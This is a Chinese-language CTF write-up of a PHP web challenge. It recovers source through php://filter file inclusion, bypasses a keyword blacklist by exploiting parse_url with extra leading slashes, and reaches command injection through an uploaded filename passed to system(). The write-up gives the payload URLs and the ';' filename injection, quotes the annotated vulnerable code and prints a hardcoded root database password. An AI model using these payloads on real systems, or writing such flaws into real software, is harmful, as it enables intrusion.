仅记录我的知识收集。
进入环境,可以看到一个登录框。

先尝试用弱口令登录。

提示有 WAF，那就先不尝试 SQL 注入了。访问 register.php 可以注册一个账号（register.php 是目录扫描扫出来的）。

登录后来到这个页面，看到 URL 里的 page 参数直接指定了要加载的页面，推测存在任意文件读取（文件包含）或任意文件下载。

利用 php://filter 伪协议读取 user.php、login.php、register.php 等文件的源码（base64 编码后再解码）。
user.php?page=php://filter/read/convert.base64-encode/resource=user
这里没有加 .php 后缀，是因为 user.php 里的 include "$page.php" 会自动补上。
user.php
- // user.php (recovered via php://filter; the opening <?php tag is not shown).
- // Per-role page dispatcher: picks $page and includes "$page.php".
- require_once("function.php");
- // NOTE(review): Header() without exit/die — an unauthenticated request is only
- // *asked* to redirect; execution continues down to the include below.
- if( !isset( $_SESSION['user'] )){
- Header("Location: index.php");
-
- }
- // isadmin is compared strictly against the string '1' (login() stores it as fetched from the DB).
- if($_SESSION['isadmin'] === '1'){
- $oper_you_can_do = $OPERATE_admin;
- }else{
- $oper_you_can_do = $OPERATE;
- }
- //die($_SESSION['isadmin']);
- // Admins may request any page; guests are only steered away from 'info' — and again
- // only by a Header() with no exit, so $page stays 'info' and is still included.
- if($_SESSION['isadmin'] === '1'){
- if(!isset($_GET['page']) || $_GET['page'] === ''){
- $page = 'info';
- }else {
- $page = $_GET['page'];
- }
- }
- else{
- if(!isset($_GET['page'])|| $_GET['page'] === ''){
- $page = 'guest';
- }else {
- $page = $_GET['page'];
- if($page === 'info')
- {
- // echo("");
- Header("Location: user.php?page=guest");
- }
- }
- }
- // filter_directory() (function.php) blacklists a few keywords in the *re-parsed*
- // REQUEST_URI, not in $_GET; the allowlist check against $oper_you_can_do is commented out,
- // so $OPERATE / $OPERATE_admin from config.php are never enforced.
- filter_directory();
- //if(!in_array($page,$oper_you_can_do)){
- // $page = 'info';
- //}
- // LOCAL FILE INCLUSION: $page comes straight from $_GET and only gets ".php" appended,
- // so php://filter/... wrappers read arbitrary source. Fix: restore the in_array()
- // allowlist above (with strict=true) and exit after every Header("Location: ...").
- include "$page.php";
- ?>
index.php
- // index.php: logged-in users are sent to user.php, everyone else gets the login template.
- // NOTE(review): this gate tests $_SESSION['login'] while user.php tests $_SESSION['user'];
- // login() sets both, but the two checks are not interchangeable if either is ever set alone.
- require_once "function.php";
- if(isset($_SESSION['login'] )){
- Header("Location: user.php?page=info");
- }
- else{
- include "templates/index.html";
- }
- ?>
register.php
- // register.php: handles the registration POST, then renders the form or redirects.
- require_once "function.php";
- // NOTE(review): $_POST['action'] is read without isset(); the resulting notice is hidden by
- // config.php's error_reporting(). No CSRF token on the form.
- if($_POST['action'] === 'register'){
- if (isset($_POST['username']) and isset($_POST['password'])){
- $user = $_POST['username'];
- $pass = $_POST['password'];
- // register() returns the new insert_id, so any INSERT failure (not only a duplicate
- // username) is reported as "Username has been registered!".
- $res = register($user,$pass);
- if($res){
- // Header() without exit: the register template below is still rendered into the response.
- Header("Location: index.php");
- }else{
- $errmsg = "Username has been registered!";
- }
- }
- else{
- Header("Location: error_parameter.php");
- }
- }
- if (!$_SESSION['login']) {
- include "templates/register.html";
- } else {
- // NOTE(review): "Location :" (space before the colon) is not a valid Location header name;
- // browsers will most likely not follow this redirect — verify on the target.
- Header("Location : user.php?page=info");
- }
-
- ?>
function.php
- // function.php: shared helpers. session_start() runs whenever this file is required,
- // so $_SESSION is populated for user.php / index.php / register.php.
- session_start();
- require_once "config.php";
- // Redirect the offending request to hacker.php and stop processing.
- // Called as hacker() further down; PHP function names are case-insensitive, so both resolve.
- function Hacker()
- {
- Header("Location: hacker.php");
- die();
- }
-
-
- // Keyword blacklist over the query string; any hit redirects via hacker() and dies.
- // SECURITY NOTE(review): the check runs on $_SERVER["REQUEST_URI"] re-parsed with
- // parse_url()+parse_str(), NOT on the $_GET array that user.php actually includes from.
- // If parse_url() returns false or splits the URI differently from the web server (e.g. a
- // URI with extra leading slashes — confirm against the target PHP version), $uri['query']
- // is empty, $query is empty, nothing is checked, and $_GET['page'] still carries the payload.
- // Fix: iterate $_GET (and $_POST) directly — or better, allowlist $page in user.php.
- function filter_directory()
- {
- $keywords = ["flag","manage","ffffllllaaaaggg"];
- $uri = parse_url($_SERVER["REQUEST_URI"]);
- // With no usable query component this yields an empty $query — the bypass above lands here.
- parse_str($uri['query'], $query);
- // var_dump($query);
- // die();
- foreach($keywords as $token)
- {
- foreach($query as $k => $v)
- {
- // stristr() is case-insensitive, so FLAG / Flag are matched as well.
- if (stristr($k, $token))
- hacker();
- if (stristr($v, $token))
- hacker();
- }
- }
- }
-
- // Same blacklist as filter_directory() plus "info". Not called from the recovered
- // user.php (which calls filter_directory() for both roles), so it shares the same
- // parse_url()-vs-$_GET weakness and adds no protection as deployed.
- function filter_directory_guest()
- {
- $keywords = ["flag","manage","ffffllllaaaaggg","info"];
- $uri = parse_url($_SERVER["REQUEST_URI"]);
- parse_str($uri['query'], $query);
- // var_dump($query);
- // die();
- foreach($keywords as $token)
- {
- foreach($query as $k => $v)
- {
- if (stristr($k, $token))
- hacker();
- if (stristr($v, $token))
- hacker();
- }
- }
- }
-
- // Input gate for usernames before they reach SQL (used by login() and register()).
- // Pass 1: every byte must appear in $whitelist (note: no whitespace, no '/', no '#').
- // Pass 2: case-insensitive word blacklist. Any failure redirects via Hacker() and dies.
- // On success the value is escaped with real_escape_string (assumes $mysqli from config.php
- // is connected).
- // NOTE(review): is_string() is only tested after the value has already been indexed with
- // strlen()/$string[$i]; "username"/"password" being blacklisted is presumably why the
- // table columns carry the *_which_you_do_not_know names. Prepared statements would make
- // both passes unnecessary.
- function Filter($string)
- {
- global $mysqli;
- $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
- $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
- for ($i = 0; $i < strlen($string); $i++) {
- if (strpos("$whitelist", $string[$i]) === false) {
- Hacker();
- }
- }
- if (preg_match("/$blacklist/is", $string)) {
- Hacker();
- }
- if (is_string($string)) {
- return $mysqli->real_escape_string($string);
- } else {
- return "";
- }
- }
-
- // Thin wrapper over mysqli::query. Returns a mysqli_result for SELECT, true/false for
- // other statements, false on error. Errors are neither logged nor surfaced to callers.
- function sql_query($sql_query)
- {
- global $mysqli;
- $res = $mysqli->query($sql_query);
- return $res;
- }
-
- // Authenticate $user / $pass and populate the session on success; returns true/false.
- // NOTE(review):
- //  - passwords are unsalted md5 — use password_hash()/password_verify();
- //  - `echo $sql` writes the full query (including the username) into the response — debug left in;
- //  - the column keys below are unquoted bare constants: older PHP treats them as the
- //    literal strings with a notice/warning, PHP 8 throws an Error;
- //  - isadmin is stored exactly as fetched (a string under default mysqli settings), which is
- //    what user.php's `=== '1'` check depends on;
- //  - no session_regenerate_id() after a successful login.
- function login($user, $pass)
- {
- $user = Filter($user);
- $pass = md5($pass);
- $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
- echo $sql;
- $res = sql_query($sql);
- // var_dump($res);
- // die();
- if ($res->num_rows) {
- $data = $res->fetch_array();
- $_SESSION['user'] = $data[username_which_you_do_not_know];
- $_SESSION['login'] = 1;
- $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
- return true;
- } else {
- return false;
- }
- return;
- }
-
- // Set a user's isadmin flag. Returns true when the query did not fail.
- // SECURITY NOTE(review): unlike login()/register(), neither $level nor $user goes through
- // Filter() or real_escape_string — straight SQL injection if any caller passes
- // user-controlled values (callers are not part of the recovered code). `echo $sql` is
- // debug output. `$res == 1` is a loose compare: mysqli::query returns true for a
- // successful UPDATE and true == 1, so this means "no error", not "one row changed".
- function updateadmin($level,$user)
- {
- $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
- echo $sql;
- $res = sql_query($sql);
- // var_dump($res);
- // die();
- // die($res);
- if ($res == 1) {
- return true;
- } else {
- return false;
- }
- return;
- }
-
- // Create a non-admin (isadmin '0') account. Username goes through Filter(); password is
- // unsalted md5. Returns $mysqli->insert_id — 0 (falsy) when the INSERT fails for any reason,
- // which register.php reports as "Username has been registered!".
- function register($user, $pass)
- {
- global $mysqli;
- $user = Filter($user);
- $pass = md5($pass);
- $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
- $res = sql_query($sql);
- return $mysqli->insert_id;
- }
-
- // Destroy the session and redirect to index.php. Header() without exit — the caller
- // has to stop execution itself.
- function logout()
- {
- session_destroy();
- Header("Location: index.php");
- }
-
- ?>
config.php
- // config.php: constants, per-role page allowlists, DB connection.
- // Notices are suppressed, which hides the sloppy bare-constant / undefined-index usage
- // found throughout this code base.
- error_reporting(E_ERROR | E_WARNING | E_PARSE);
- // define() names are unquoted bare words (BASEDIR, FLAG_SIG): older PHP treats them as
- // the strings "BASEDIR"/"FLAG_SIG", PHP 8 throws. FLAG_SIG is always 1, so the
- // "you can not visit it directly" guards in ffffllllaaaaggg / m4aaannngggeee never trip.
- define(BASEDIR, "/var/www/html/");
- define(FLAG_SIG, 1);
- // Intended per-role page allowlists. user.php has the in_array() check commented out,
- // so these are never enforced.
- $OPERATE = array('userinfo','upload','search');
- $OPERATE_admin = array('userinfo','upload','search','manage');
- // SECURITY NOTE(review): root DB credentials hardcoded in a file under the web root; the
- // LFI in user.php is exactly how they were read here. Use a dedicated low-privilege DB
- // user and keep secrets outside the document root (environment / config outside htdocs).
- $DBHOST = "localhost";
- $DBUSER = "root";
- $DBPASS = "Nu1LCTF2018!@#qwe";
- //$DBPASS = "";
- $DBNAME = "N1CTF";
- $mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
- // Connection error text is echoed to the client (information leak).
- if(mysqli_connect_errno()){
- echo "no sql connection".mysqli_connect_error();
- $mysqli=null;
- die();
- }
- ?>
看到 function.php 里的 filter_directory()：它不是检查 $_GET，而是用 parse_url() 重新解析 $_SERVER['REQUEST_URI']，再用 parse_str() 取出查询参数做关键字黑名单。只要构造一个让 parse_url() 解析失败（返回 false）或解析结果与 Web 服务器不一致的 URI（例如在路径前多加斜杠，下面的 payload 就是这种写法），$query 就为空、什么都不会被拦，而 include 实际使用的 $_GET['page'] 不受影响——这就是 parse_url 解析漏洞。具体需要几个斜杠与目标 PHP 版本有关，需要实测。

利用 parse_url 解析漏洞，用下面的 payload 读取 ffffllllaaaaggg 文件：
//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
- // ffffllllaaaaggg.php (read via php://filter). config.php defines FLAG_SIG as 1, so this
- // guard never fires when included through user.php; requested directly (no config.php)
- // the bare constant is not 1, so it dies — assuming a PHP version that tolerates undefined
- // constants rather than throwing.
- if (FLAG_SIG != 1){
- die("you can not visit it directly");
- }else {
- echo "you can find sth in m4aaannngggeee";
- }
- ?>
再接着去看m4aaannngggeee
- // m4aaannngggeee.php (read via php://filter). Same FLAG_SIG guard as above, then it
- // includes the upload form; per the writeup, that form posts to upllloadddd.php.
- if (FLAG_SIG != 1){
- die("you can not visit it directly");
- }
- include "templates/upload.html";
-
- ?>
发现了 templates/upload.html，直接访问该页面（payload：/templates/upload.html）。

随便上传一个 PHP 文件，页面报错，错误信息里暴露了处理上传的文件 upllloadddd.php。
再回去用 php://filter 伪协议读取 upllloadddd.php 的源码。
- // upllloadddd.php (read via php://filter): upload handler.
- // SECURITY NOTE(review): the order is move -> system() -> error/extension checks, so the
- // shell command runs on whatever filename the client sent *before* anything is validated;
- // the later unlink() does not undo that. $size is never used.
- $allowtype = array("gif","png","jpg");
- $size = 10000000;
- $path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
- // Client-controlled name, used verbatim for the destination path and, below, in a shell command.
- $filename = $_FILES['file']['name'];
- if(is_uploaded_file($_FILES['file']['tmp_name'])){
- if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
- die("error:can not move");
- }
- }else{
- die("error:not an upload file!");
- }
- $newfile = $path.$filename;
- echo "file upload success
"; - echo $filename;
- // COMMAND INJECTION: $filename is concatenated into a shell string unescaped; a name such
- // as `x.jpg;<cmd>` runs <cmd>, and system() echoes the command output into the response.
- // Fix: drop the shell entirely — base64_encode(file_get_contents($newfile)) — or at the
- // very least escapeshellarg($filename); and validate the extension *before* moving the file.
- $picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
- echo "
"; - if($_FILES['file']['error']>0){
- unlink($newfile);
- die("Upload file error: ");
- }
- // Extension check is last and case-sensitive; a rejected file is unlinked but the script
- // continues. The upload directory is relative to the script, so presumably web-reachable.
- $ext = array_pop(explode(".",$_FILES['file']['name']));
- if(!in_array($ext,$allowtype)){
- unlink($newfile);
- }
- ?>
注意这一行调用了 system()，而 $filename 直接取自 $_FILES['file']['name']，没有经过 escapeshellarg() 处理就拼进了 shell 命令，因此文件名可控即可注入任意命令（命令注入）：
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
但是需要找到真正的上传入口：真正的上传页面在前面提到的 m4aaannngggeee 里（它 include 了 templates/upload.html），
payload：/user.php?page=m4aaannngggeee
文件名里不能带 /（通常是 PHP 处理上传时已经去掉了路径部分），所以在文件名里用 ; 把命令隔开即可。注意 system() 在扩展名检查之前就执行了，所以即使文件最后被 unlink，命令也已经跑过；system() 的输出会直接回显在页面上。

题不难就是有点绕
。。。